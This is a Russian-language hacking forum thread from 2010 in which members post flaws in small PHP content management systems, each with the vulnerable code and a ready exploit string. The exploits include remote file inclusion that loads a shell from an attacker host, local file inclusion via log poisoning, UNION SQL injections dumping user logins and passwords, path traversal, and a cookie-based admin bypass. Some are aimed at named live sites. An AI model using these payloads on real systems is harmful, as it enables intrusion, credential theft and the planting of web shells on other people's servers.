NibbleBlog 2.0 Remote File Inclusion |

03.06.2010, 13:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
NibbleBlog 2.0 Remote File Inclusion
NibbleBlog 2.0
Site: http://www.nibbleblog.com
Remote File Inclusion
Vuln file: /admin/includes/index_login.php
PHP код:
if($var_url['exe']=='login')
{
$var_form['login_user'] = (string) $_POST['form_field_user'];
$var_form['login_password'] = (string) $_POST['form_field_password'];
if( !empty($var_form['login_user']) && !empty($var_form['login_password']) )
{
include($_PATH['shadow.php']);
/*...*/
Подобная уязвимость в /admin/includes/profile.php
Need: register_globals = On
Exploit:
Код:
POST http://[host]/[path]/admin/includes/index_login.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
var_url[exe]=login&form_field_user=1&form_field_password=1&_PATH[shadow.php]=http://[evil_host]/shell.wtf
__________________
Avant que l'ombre...
|
|
|

07.06.2010, 23:25
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
С нами:
9061820
Репутация:
134
|
|
E2 SELECTA
Site: http://blogengine.ru/
Local File Include(0-day ):
./spesta/counter.php
Уязвимый код:
PHP код:
...
if (!isset ($s_addurl))
{
$z=dirname(__FILE__);
$z2=$_SERVER['DOCUMENT_ROOT'].dirname ($_SERVER['PHP_SELF']);
$s_addurl=substr ($z, strpos ($z, $z2)+strlen($z2));
if ($s_addurl!="") $s_addurl.="/";
}
else [COLOR=DarkRed]$s_addurl=str_replace (":","", $s_addurl);[/COLOR]
include ($s_addurl."func.php");
...
Exploit:
Как видно из нашей переменной вырезается двоеточие, поэтому теоретически имеем только локальный инклуд, однако нам на руку то, что движок ведёт своеобразный журнал по адресу ./spesta/data/, в частности в файл requests.php записывается запрошенный URL, и ничто не мешает указать в нём например <?php phpinfo();?>, поэтому сначала обращаемся к какой-нибудь страницe добавив к URL-адресу наш php-код, а затем инклудим вот так:
Код:
./spesta/counter.php?s_addurl=data/request.txt%00
Также можно внести код в agents.txt(логируются юзерагенты).
Примечание:
для этой уязвимости не играет роли значение register_globals, так как в .htacess эта настройка взводится, однако на всякий случай я решил уведомить об этом.
Содержимое .htacess:
Код:
RewriteEngine Off
DirectoryIndex index.php
Options -Indexes -MultiViews
ErrorDocument 403 /stat/deny.php
<IfModule mod_php4.c>
php_flag display_errors off
php_flag register_globals on
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off
php_flag magic_quotes_sybase off
php_flag zlib.output_compression on
php_value output_buffering 0
php_value session.use_trans_sid 0
</IfModule>
<IfModule mod_php5.c>
php_flag display_errors off
php_flag register_globals on
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off
php_flag magic_quotes_sybase off
php_flag zlib.output_compression on
php_value output_buffering 0
php_value session.use_trans_sid 0
</IfModule>
Последний раз редактировалось _iks_; 13.06.2010 в 11:27..
|
|
|

09.06.2010, 23:44
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
С нами:
9061820
Репутация:
134
|
|
KaRoman CMS
http://sourceforge.net/projects/karoman/
SQL-инъекция(mq == off): ./view_article.php?id=0'+union+select+1,concat(user, 0x3a,pass),3,4,5,6,7,8+FROM+userlist--+
PHP код:
...
if (isset($_GET['id'])) {$id = $_GET['id'];}
$result = mysql_query("SELECT * FROM articles WHERE id='$id'",$db); // Выбираем нужные таблицы
...
SQL-иньекция(права администратора): ./admin/settings.php?id=100500+union+select+1,2,3,4,5,6
PHP код:
...
if (isset($_GET['id'])) {$id = $_GET['id'];}
$result = mysql_query("SELECT title,id FROM settings");
...
SQL-иньекция(права администратора): ./admin/edit_art.php?id=100500+union+select+1,2,3,4,5,6,7, 8
PHP код:
...
if (isset($_GET['id'])) {$id = $_GET['id'];}
$result = mysql_query("SELECT * FROM articles WHERE id=$id");
...
|
|
|

14.06.2010, 12:12
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Ov3rLo1d[-]Invisible
http://wowjp.net/forum/61-15808-1
/admin/index.php
PHP код:
...
if (!isset($HTTP_POST_VARS["submitloginform"]) && (($HTTP_COOKIE_VARS['userlogged'] == "yes") || ($_SESSION['sessionlogin'] == "yes"))) {
/* Sets $PHPSESSID to the PHPSESSID in the cookie */
$PHPSESSID = $HTTP_COOKIE_VARS['userid'];
/* Set $mode to the thingy on the url */
$mode = $HTTP_GET_VARS['mode'];
/* Removes the cookie before anything is displayed */
if ($mode == "logout") {
session_destroy();
setcookie("userlogged", "", time()-600);
setcookie("userid", "", time()-600);
}
...
Добавляем себе в куки userlogged = yes
Код:
http://shadow-server.ru/admin/
Последний раз редактировалось SeNaP; 14.06.2010 в 22:42..
|
|
|

16.06.2010, 23:31
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Puzzle Apps CMS 3.2
site:www.puzzleapps.org
File Disclosure
file: filepresenter.loader.php
PHP код:
if ($_GET["getfile"]) {
$filename = $_GET["filename"];
if (! $filename)
$filename = "file";
header('Content-Disposition: attachment; filename="' . $filename . '"');
header("Content-type: application/octetstream");
header("Pragma: no-cache");
header("Expires: 0");
readfile($FILEROOT . $_GET["getfile"], "r+");
die();
}
result:
Код:
filepresenter.loader.php?getfile=../../[local_file]&filename=wtf.txt
|
|
|

17.06.2010, 17:39
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
KAN CMS 1.0 beta
site: www.kancms.org
SQL-Injection
need: mq=off
file: pages/sections.php
PHP код:
include('site_selector.php');
// next we'll include the section manager component to enable the template
// easily pick information from database
include('sections_manager.php');
// next we need to load the specific theme / template index file
// the $themeFolder variable is created in the site selector
include( $themeFolder . 'pages/sections.php');
/***************************************************************************/
//file: pages/site_selector.php
if( !isset($_GET['siteid']) ) {
//header("Location: ../pages/");
$query = "SELECT * FROM sites WHERE sitetype = 'main'";
$rsSite = mysql_query($query, $config);
$row_rsSite = mysql_fetch_assoc($rsSite);
$site_identifier = $row_rsSite['SiteIdentifier'];
mysql_free_result($rsSite);
$_GET['siteid'] = $site_identifier;
} else {
$site_identifier = $_GET['siteid'];
}
// find the site ID for the specified identifier
$query = "SELECT * FROM sites WHERE SiteIdentifier = '$site_identifier'";
$rsSite = mysql_query($query, $config);
$row_rsSite = mysql_fetch_assoc($rsSite);
result:
Код:
/pages/sections.php?siteid=-kan'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+&mid=3&sid=6
Также уязвим пареметр mid
Код:
/pages/sections.php?siteid=kan&mid=-1+union+select+1,2,3,4,5,6,7,8,9+--+&sid=6
example:
Код:
http://www.kancms.org/pages/sections.php?siteid=kan&mid=-3+/*!union*/+select+1,2,3,4,5,6,7,8,9+--+&sid=6
//мб нашел бы больше,но двиг,сцуко,не установился
//Двойной запрос, можно шелл залить Ctacok
// а так не залить что-ли, если требования mq=off? Jokester
Последний раз редактировалось Jokester; 17.06.2010 в 18:39..
|
|
|

18.06.2010, 17:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами:
9285506
Репутация:
1463
|
|
Moa Gallery v1.2.2 (Updated 2010-06-17)
http://sourceforge.net/projects/moagallery/
В скриптах выставлена защита
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"CFG"[/COLOR][COLOR="#007700"]]))
{
echo[/COLOR][COLOR="#DD0000"]"Hacking attempt."[/COLOR][COLOR="#007700"];
die();
}
[/COLOR][/COLOR]
но в mod_main_funcs.php защита отсутствует
sources/mod_main_funcs.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// mod_gallery_funcs.php - This is a collection of functions that interect with the database and a gallery.
[/COLOR][COLOR="#007700"]include_once([/COLOR][COLOR="#0000BB"]$CFG[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"MOA_PATH"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"sources/_error_funcs.php"[/COLOR][COLOR="#007700"]);
include_once([/COLOR][COLOR="#0000BB"]$CFG[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"MOA_PATH"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"sources/_db_funcs.php"[/COLOR][COLOR="#007700"]);
include_once([/COLOR][COLOR="#0000BB"]$CFG[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"MOA_PATH"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"sources/mod_image_funcs.php"[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
RFI or LFI
rg=on
http://localhost/Moa-1.2.2/sources/mod_main_funcs.php?CFG[MOA_PATH]=http://site.com/shell.txt%00
В версиях ниже 1.2.1 скрипт отсутствует.
|
|
|

18.06.2010, 17:29
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Zyke CMS 1.1
site:www.zykecms.com
Authorization bypass
need: mq=off
file: index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'loginbt'[/COLOR][COLOR="#007700"]]))
{
if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])
{
if ([/COLOR][COLOR="#0000BB"]check_login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])
{
if ([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'function'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: admin/'[/COLOR][COLOR="#007700"]);
else
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: '[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$error_login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
}
else
{
[/COLOR][COLOR="#0000BB"]$error_login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"wrong username/password "[/COLOR][COLOR="#007700"];
}
}
}
...................
function[/COLOR][COLOR="#0000BB"]check_login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM users WHERE login='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND password='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$num[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$num[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]session_start[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'last_access'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'function'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'function'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'firstname'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'firstname'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lastname'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lastname'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
else
return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
result:
SQL-Injection
need: mq=off
file: index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#0000BB"]get_sidebar[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])
...................
function[/COLOR][COLOR="#0000BB"]get_sidebar[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM content WHERE urlname = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
if([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM content WHERE id = '1'"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
}
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sidebar'[/COLOR][COLOR="#007700"]];
}
[/COLOR][/COLOR]
result:
Код:
/index.php?p=content&id=-home'+union+select+1,2,concat_ws(0x3a,id,login,password),4,5,6,7+from+users--+
LFI
need: mq=off
file: index.php :d
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]]))
if ([/COLOR][COLOR="#0000BB"]is_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"]))
include ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
result:
Код:
/index.php?p=../../[local_file]%00&id=home
//зачетная cms...
|
|
|

18.06.2010, 23:45
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
PhpBpCms
Download: http://sourceforge.net/projects/phpbpcms/
Vuln: Local Files Include
Need: magic_quotes_gpc = Off
file: index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//update of redirecting variables $_SESSION[redirect_1], [redirect_2]redirect_update();*/
[/COLOR][COLOR="#007700"]if(![/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]])
include([/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$conf[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'default_module'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
else
include([/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
result:
Код:
/index.php?module=[local_file]%00
|
|
|

24.06.2010, 16:12
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
С нами:
9061820
Репутация:
134
|
|
Grayscale BandSite CMS Ver. 1.1.4
Site: http://sourceforge.net/projects/bandsitecms/
SQL-иньекция(-):
Уязвимый файл:
./includes/content/interview_content.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$intid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'intid'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]// define the query
// if the $memid variable is set, that means we're displaying a full bio and we should select the specific member entry
[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$intid[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"
SELECT
*
FROM
interviews
WHERE
rec_id=[/COLOR][COLOR="#0000BB"]$intid[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
Эксплуатация:
./interviews.php?intid=-2+union+select+1,2,^,^,5,6,^,8,9,10
SQL-иньекция(-):
Уязвимый файл:
./includes/content/lyrics_content.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sid'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]// if the $sid variable is set, it means we're only after one song, so retrieve just that one
[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#FF8000"]// define the query to get this song
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"
SELECT
*
FROM
lyrics
WHERE
rec_id=[/COLOR][COLOR="#0000BB"]$sid[/COLOR][COLOR="#DD0000"] LIMIT
1"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// get the result
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Эксплуатация:
/lyrics.php?sid=1+union+select+1,2,^,4,5,6,^,8,9
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|